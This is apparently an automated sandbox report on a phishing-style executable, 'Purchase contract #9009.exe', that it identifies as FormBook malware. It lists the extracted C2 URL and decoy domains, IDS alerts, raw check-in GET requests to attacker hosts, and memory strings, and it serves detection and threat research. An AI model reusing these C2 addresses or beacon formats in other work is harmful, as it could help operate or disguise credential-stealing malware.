Windows Analysis Report Purchase contract #9009.exe

AV Detection:

Found malware configuration

Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.narrowpathwc.com/n8ba/"], "decoy": ["thefitflect.com", "anytourist.com", "blggz.xyz", "ascope.club", "obyeboss.com", "braun-mathematik.online", "mtsnurulislamsby.com", "jwpropertiestn.com", "animalds.com", "cunerier.com", "sillysocklife.com", "shopliyonamaaghin.net", "theredcymbalsco.com", "lostbikeproject.com", "ryggoqlmga.club", "realestatetriggers.com", "luvlauricephotography.com", "cheesehome.cloud", "5fashionfix.net", "wata-6-rwem.net", "ominvestment.net", "rrinuwsq643do2.xyz", "teamtacozzzz.com", "newjerseyreosales.com", "theresahovo.com", "wowmovies.today", "77k6tgikpbs39.net", "americagoldenwheels.com", "digitaladbasket.com", "gcagame.com", "arielatkins.net", "2020coaches.com", "effthisshit.com", "nycabl.com", "fbvanminh.com", "lovebirdsgifts.com", "anxietyxpill.com", "recaptcha-lnc.com", "aprendelspr.com", "expatinsur.com", "backtothesimplethings.com", "pcf-it.services", "wintonplaceoh.com", "designermotherhood.com", "naamt.com", "lifestylebykendra.com", "thehighstatusemporium.com", "oneninelacrosse.com", "mariasmoworldwide.com", "kitesurf-piraten.net", "atelierbond.com", "mynjelderlaw.com", "moucopia.com", "hauhome.club", "imroundtable.com", "thralink.com", "baoequities.com", "nassy.cloud", "goldenstatelabradoodles.com", "revenueremedyintensive.com", "dfendglobal.com", "pugliaandgastronomy.com", "cypios.net", "trinioware.com"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exe

ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: Purchase contract #9009.exe	Virustotal: Detection: 25%			Perma Link
Source: Purchase contract #9009.exe	ReversingLabs: Detection: 36%

Yara detected FormBook

Source: Yara match	File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Purchase contract #9009.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 4.2.MSBuild.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: Purchase contract #9009.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Purchase contract #9009.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: explorer.pdbUGP source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.677675912.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000004.00000002.717581490.000000000169F000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.905256355.0000000004BEF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: MSBuild.exe, explorer.exe
Source:	Binary string: explorer.pdb source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.677675912.0000000005A00000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then pop esi		4_2_00415806
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop esi		9_2_02EB5806

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49760 -> 160.153.136.3:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49760 -> 160.153.136.3:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49760 -> 160.153.136.3:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 95.215.210.10:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 95.215.210.10:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 95.215.210.10:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.189:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.189:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.189:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.narrowpathwc.com/n8ba/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.narrowpathwc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.braun-mathematik.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=fB7/mPW92pywn6Xwyqh18GEo+pmrDDvkC2n8/jDO98DpKsBXISRlqcqxysno3HWOzWNm&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.lifestylebykendra.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=uqosld0xCubOoSnMdKEGpsNAFVDy7sF9Olr0VLFZOqMlxplbtWpRciavlLjLwEv6WKyy&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.teamtacozzzz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=u7WOyhgrWbXbYgRGE85LieZphkZvcqsYIxt4hYVfzjTWHfz/MeXFN6mo9gA2dLoLONcI&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.ascope.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=6Zij7uW2iyXo7QMuDf/VYdYdyy83rT/k8hgIaZr1o/2iUx0BtZlp/rHpkQfYtJhmSC7t&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.5fashionfix.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=S2NOBXxegNI52ult/GTqJZ9TvZOj5eG5l/LBY5m0t3ElylZ3sbPSB2bMMu9lbAS6Kry+&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.mtsnurulislamsby.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=AVTd1ZN6JRCl2+QDYW+9mBRbWrEnsObc4Gp+SjPu6IU64q2qqDnQOXVzARk/xsnwgByw&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.wintonplaceoh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=xPi5BDAvQynHSVlVR/YHv5A7cLya1z2oKdj6PcHoa0/Qm6A62p0xrLdBVFxzQSXilAdH&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.backtothesimplethings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 95.215.210.10 95.215.210.10
Source: Joe Sandbox View	IP Address: 209.99.40.222 209.99.40.222

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: NEWIT-ASRU NEWIT-ASRU
Source: Joe Sandbox View	ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View	ASN Name: WEEBLYUS WEEBLYUS

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.narrowpathwc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.braun-mathematik.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=fB7/mPW92pywn6Xwyqh18GEo+pmrDDvkC2n8/jDO98DpKsBXISRlqcqxysno3HWOzWNm&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.lifestylebykendra.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=uqosld0xCubOoSnMdKEGpsNAFVDy7sF9Olr0VLFZOqMlxplbtWpRciavlLjLwEv6WKyy&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.teamtacozzzz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=u7WOyhgrWbXbYgRGE85LieZphkZvcqsYIxt4hYVfzjTWHfz/MeXFN6mo9gA2dLoLONcI&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.ascope.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=6Zij7uW2iyXo7QMuDf/VYdYdyy83rT/k8hgIaZr1o/2iUx0BtZlp/rHpkQfYtJhmSC7t&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.5fashionfix.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=S2NOBXxegNI52ult/GTqJZ9TvZOj5eG5l/LBY5m0t3ElylZ3sbPSB2bMMu9lbAS6Kry+&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.mtsnurulislamsby.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=AVTd1ZN6JRCl2+QDYW+9mBRbWrEnsObc4Gp+SjPu6IU64q2qqDnQOXVzARk/xsnwgByw&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.wintonplaceoh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ba/?3fu=xPi5BDAvQynHSVlVR/YHv5A7cLya1z2oKdj6PcHoa0/Qm6A62p0xrLdBVFxzQSXilAdH&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.backtothesimplethings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.narrowpathwc.com

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Tue, 03 Aug 2021 20:58:18 GMTServer: ApacheX-Powered-By: PHP/7.4.21Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://braun-mathematik.de/wp-json/>; rel="https://api.w.org/"Data Raw: 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 09 3c 68 65 61 64 3e 0a 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 4e<!DOCTYPE html><html class="no-js" lang="de-DE"><head><meta charset="

URLs found in memory or binary data

Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://domain.idwebhosting.net/linkhandler/servlet/RenewDomainServlet?validatenow=false&orderid=
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libg.png)
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libgh.png)
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/logo.png)
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.666382323.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: Purchase contract #9009.exe, 00000001.00000003.641742892.00000000054C7000.00000004.00000001.sdmp, Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Purchase contract #9009.exe, 00000001.00000003.641859108.00000000054C6000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Purchase contract #9009.exe, 00000001.00000003.641859108.00000000054C6000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.como.
Source: Purchase contract #9009.exe, 00000001.00000003.642994387.00000000054C7000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comva
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Purchase contract #9009.exe, 00000001.00000003.644334757.00000000054FD000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Purchase contract #9009.exe, 00000001.00000003.645950157.00000000054FD000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Purchase contract #9009.exe, 00000001.00000003.645781018.00000000054FD000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlv
Source: Purchase contract #9009.exe, 00000001.00000003.645715148.00000000054CB000.00000004.00000001.sdmp, Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Purchase contract #9009.exe, 00000001.00000002.666374405.0000000000BE7000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.comcea
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: Purchase contract #9009.exe, 00000001.00000003.641605989.00000000054C4000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Purchase contract #9009.exe, 00000001.00000003.641605989.00000000054C4000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnL
Source: Purchase contract #9009.exe, 00000001.00000003.648690279.00000000054F7000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Purchase contract #9009.exe, 00000001.00000003.648690279.00000000054F7000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/~;
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://www.mtsnurulislamsby.com/10_Best_Mutual_Funds.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6Rbgi
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://www.mtsnurulislamsby.com/Best_Penny_Stocks.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6RbgieN1
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://www.mtsnurulislamsby.com/Credit_Card_Application.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6R
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://www.mtsnurulislamsby.com/High_Speed_Internet.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6Rbgie
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://www.mtsnurulislamsby.com/Migraine_Pain_Relief.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6Rbgi
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://www.mtsnurulislamsby.com/Work_from_Home.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6RbgieN12hb
